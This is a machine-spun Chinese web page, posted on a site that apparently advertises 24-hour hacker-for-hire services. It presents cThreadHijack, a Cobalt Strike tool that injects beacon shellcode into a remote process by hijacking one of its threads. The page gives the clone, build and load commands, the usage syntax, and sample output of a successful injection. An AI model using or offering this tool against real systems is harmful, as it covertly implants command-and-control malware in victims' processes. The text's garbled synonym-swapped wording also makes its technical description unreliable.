黑客24小时在线接单的网站

黑客24小时在线接单的网站

2022年04月03日 17:15:00

如何使用cThreadHijack实现远程进程注入研究

有关cThreadHijack

cThreadHijack是一个对于远程进程引入信标目标文档(BOF),该软件关键根据线程挟持技术性完成其作用,而且不容易生成一切远程线程。

运行机制

cThreadHijack可以按照客户带来的窃听器主要参数来生成初始信标Shellcode,并按照客户带来的PID主要参数将其引入至远程进程中,这一步关键运用的是VirtualAllocEx和WriteProcessMemory方式。

下面,cThreadHijack并不会根据CreateRemoteThread或别的API生成一个新的远程线程,反而是鉴别总体目标进程中的第一个线程,挂起来总体目标线程以后,它便会根据一个CONTEXT结构体来获得线程CPU情况的內容。下面,它会改动CONTEXT结构体中RIP存储器组员的详细地址,并将其偏向远程Payload。

在实行以前,cThreadHijack会将一个封装形式了信标Shellcode的程序流程加上至一个对于CreateThread的启用方式中。CreateThread程序流程封装形式在一个名字叫做NtContinue的调用函数程序流程,可以容许以前遭劫持的线程在没有造成远程进程奔溃的条件下修复运作。cThreadHijack的信标Payload在生成的时候会含有一个“线程撤出函数公式”,以容许进程在信标撤出以后执行。

信标窃听器的名字假如包括空格符得话,务必放到冒号中。

专用工具免费下载

众多科学研究工作人员可以应用以下指令将该新项目源代码复制至当地:

  • gitclonehttps://github.com/connormcgarr/cThreadHijack.git

    • 新项目搭建

    最先,在一台Windowsvm虚拟机上,点一下Win键,键入“x64 Native Tools”开启“x64 Native Tools Command Prompt for VS”提示框。

    下面,将文件目录改动为“C:\path\to\cThreadHijack”。

    随后运作以下指令:

  • nmake-fMakefile.msvcbuild

    • 最终,根据Cobalt Strike的“Script Console”及其主要参数“load /path/to/cThreadHijack.cna”来载入cThreadHijack.cna。

    专用工具应用

  • cThreadHijackPIDLISTENER_NAME

    • 运作結果样例如下:

  • beacon>cThreadHijack7340TESTING
  • [ ]hostcalledhome,sent:268433bytes
  • [ ]receivedoutput:
  • [ ]TargetprocessPID:7340
  • [ ]receivedoutput:
  • [ ]OpenedahandletoPID7340
  • [ ]receivedoutput:
  • [ ]Foundathreadinthetargetprocess!ThreadID:10212
  • [ ]receivedoutput:
  • [ ]Suspendingthetargetedthread...
  • [ ]receivedoutput:
  • [ ]WroteBeaconshellcodetotheremoteprocess!
  • [ ]receivedoutput:
  • [ ]VirtualmemoryforCreateThreadandNtContinueroutinesallocatedat0x201f4ab0000insideoftheremoteprocess!
  • [ ]receivedoutput:
  • [ ]SizeofNtContinueroutine:64bytes
  • [ ]SizeofCONTEXTstructure:1232bytes
  • [ ]Sizeofstackalignmentroutine:4
  • [ ]SizeofCreateThreadroutine:64
  • [ ]Sizeofshellcode:261632bytes
  • [ ]receivedoutput:
  • [ ]Wrotepayloadtobuffertopreviouslyallocatedbufferinsideof!
  • [ ]receivedoutput:
  • [ ]CurrentRIP:0x7ffa55df69a4
  • [ ]receivedoutput:
  • [ ]Successfullypointedthetargetthread'sRIPregistertotheshellcode!
  • [ ]receivedoutput:
  • [ ]CurrentRIP:0x201f4ab0000
  • [ ]receivedoutput:
  • [ ]Resumingthethread!PleasewaitafewmomentsfortheBeaconpayloadtoexecute...

    • 新项目详细地址

    cThreadHijack:【GitHub传送器】

    标签:cThreadHijack 远程进程注入 网络攻击 

    作者:访客 , 分类:网络钓鱼 , 浏览:469 , 评论:1

    • 评论列表:
    •  鸽吻绮筵
       发布于 2022-06-11 09:08:40  回复该评论
    • na。专用工具应用cThreadHijackPIDLISTENER_NAME运作結果样例如下:beacon>cThreadHijack7340TESTING[ ]hostcalledhome,sent:268433bytes[ ]rec

    发表评论:

    Powered By

    Copyright Your WebSite.Some Rights Reserved.